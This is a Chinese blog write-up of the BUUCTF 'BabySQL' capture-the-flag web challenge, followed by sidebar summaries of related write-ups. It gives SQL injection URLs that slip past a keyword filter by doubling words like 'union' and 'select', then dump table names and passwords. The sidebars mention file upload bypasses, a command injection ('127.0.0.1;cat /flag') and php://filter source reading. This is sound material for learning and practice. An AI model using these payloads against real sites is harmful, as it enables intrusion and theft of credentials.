buuctf-web-[极客大挑战 2019]BabySQL-wp

最新推荐文章于 2024-05-03 21:13:16 发布
最新推荐文章于 2024-05-03 21:13:16 发布
阅读量227 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118785243
版权

[极客大挑战 2019]BabySQL

知识点

  • 双写绕过

过程

主页是一个登录框

随便输入两个参数,发现是传入的是get型参数

首先注入肯定存在,先尝试联合查询注入:

check.php?username=admin%27+union+select+1%2C2%2C3%23&password=admin

失败,双写union 和 select可绕过

check.php?username=admin%27+ununionion+seselectlect+1%2C2%2C3%23&password=admin

登陆成功,将参数admin置为假,可以看到页面有显示位置:

check.php?username=-admin%27+ununionion+seselectlect+1%2C2%2C3%23&password=admin

然后尝试注入

/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=database()),3 %23&password=1111


check.php?username=1' ununionion selselectect 1,(seselectlect group_concat(passwoorrd) frfromom b4bsql),3 %23&password=1111

居上7788
关注
专栏目录
buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 953
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 906
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTF WEB [极客挑战 2019]BabySQL
Y1da的博客
04-16 166
BUUCTF WEB [极客挑战 2019]BabySQL 进入环境后尝试万能密码登录失败,尝试常规sql注入 check.php?username=1&password=2' union select 1,2,3;# 回显 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use n
[极客挑战 2019]BabySQL wp
{OvEr}的博客
11-18 213
[极客挑战 2019]BabySQL wp 主要考点就是sql注入,以及replace()函数过滤,解决方法双写绕过 打开页面,试试万能密码,发现密码不对,可以判断是sql注入,方式是get请求。 接下来就是查列数,试试注入 ?username=admin&password=123 %27 order by 1 %23 发现回显只显示出了der 1,说明or 和 by 都被过滤了,那我们就试一试双写能否绕过 发现没有报错,那么双写就可以绕过过滤,继续查列数,当查到4 的时候报错,列数为3.
[极客挑战 2019]BabySQL WP
qq_43039823的博客
07-30 268
[极客挑战 2019]BabySQL 1 实话说起来这个题目其实挺套娃的 打开一个又是一个登录界面,好啊,先试试万能密码?username=admin’ or 1=1#&password=123 意料之中的报错。查看一下自己的url发现呢, 大概是对我们所输入的内容,进行了相应的检查,check.php ,然后我们在URL中 输入的东西,在下端没有回显,由此可确定我们输入的sql语句中的一些关键词,被过滤。 而且我们跳转到了 check.php 界面 ,由此我们才测试哪
buuctf-web极客挑战2019
qq_47804678的博客
02-08 348
于是用bp使用post方式,注意将user=0改成user=1(意思也就是:是cuit的学生为真。一开始我还改成了“cuit's students”。一共就两个页面,就都看一下,发现还有提示:必须是cuit的学生,还得写对密码。如果不加密直接返回的话,flag.php被解析后是看不到有flag的源文件的,所以只能加密然后用在线工具再进行解密得到源文件。bp抓包发现中间302跳转时给了另一个路径secr3t.php,尝试访问,F12找到隐藏的路径.Archive_romm.php,尝试访问,
BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1121
Upload=> 文件上传漏洞。
Buuctf-Web-[极客挑战 2024]EasySQL 1 题解及思路总结(1)
2401_84281594的博客
04-28 781
(但是在本题中有两个变量,这个方法不太适用)
2024年网络安全最新Buuctf-Web-[极客挑战 2024]EasySQL 1 题解及思路总结
最新发布
2401_84264096的博客
05-03 1116
例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。原理:当闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合符。时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。可知此页面与数据库产生交互。
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 396
BUUCTF的[极客挑战 2019]BabySQL 1
BUUCTF-WEB-[极客挑战 2019]Upload
r1727337824的博客
09-06 540
BUUCTF-WEB-[极客挑战 2019]Upload》
BuuCTFBabySQL WP
weixin_51019270的博客
01-11 240
BuuCTFBabySQL WP 一:判断闭合条件 在用户名的位置输入1’显示错误,说明是单引号闭合。开始构造------》 二:构造开始 构造几遍以后构造出可以得到有用信息的网页 看报错信息可以知道,我们的or被屏蔽掉了,去网上查了一下,是被replace给替换成空白字符了。 根据前两题的经验,猜测列数是3。直接上联合查询看能不能报显示位。 成功以后直接老办法,爆库,爆表,爆列。flag还是在password的最后一个。直接上图了 拿到flag。提交然后结束。 ...
BUUCTF之[极客挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 1914
BUUCTF之[极客挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
文件上传之黑名单验证绕过
weixin_34187822的博客
09-15 691
当做代码的审计或者文件搞渗文章上传的时候有时候会遇到黑名单的验证码,比如常规的一些脚本名asp php jsp这种的不允许上传,下面是我总结的一些绕过的方法Shtml<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用来读文件<!--#exec cmd="ifconfig"--> //可...
buuctf-web-[ACTF2020 新生赛]Exec-wp
居上
06-25 201
[ACTF2020 新生赛]Exec 知识点 命令执行 过程 主页面: 这里是存在命令执行漏洞的,我们尝试去使用;执行命令 127.0.0.1;cat /flag
buuctf-web-[ACTF2020 新生赛]Include-wp
居上
06-22 188
[ACTF2020 新生赛]Include 知识点 php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。 过程 主页: 有个get型的参数,可以看到传入flag.php,这里是一个文件包含,但是无法查看php脚本的详细内容 payload ?file=php://filter/read=convert.base64-encode/resource=flag.php .
BUUCTF web wp
vegetable223的博客
11-28 418
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
buuctf-web-[ACTF2020 新生赛]BackupFile-wp
居上
07-17 234
[ACTF2020 新生赛]BackupFile 知识点 备份文件泄露 php中的弱类型比较 过程 使用扫描软件扫一下目录,扫到/index.php.bak <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);
buuctf web wp
qq_63267612的博客
04-10 554
文章目录[极客挑战 2019]EasySQL [极客挑战 2019]EasySQL 打开后是一个登录框,直接尝试万能密码 (用户名:1’ or 1=1 # 密码:随便输) 登录得到flag 这里的万能密码是为什么呢? 数据库中的查询语句: select id from users where username = '' or 1=1-- and password = '456' 又 这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值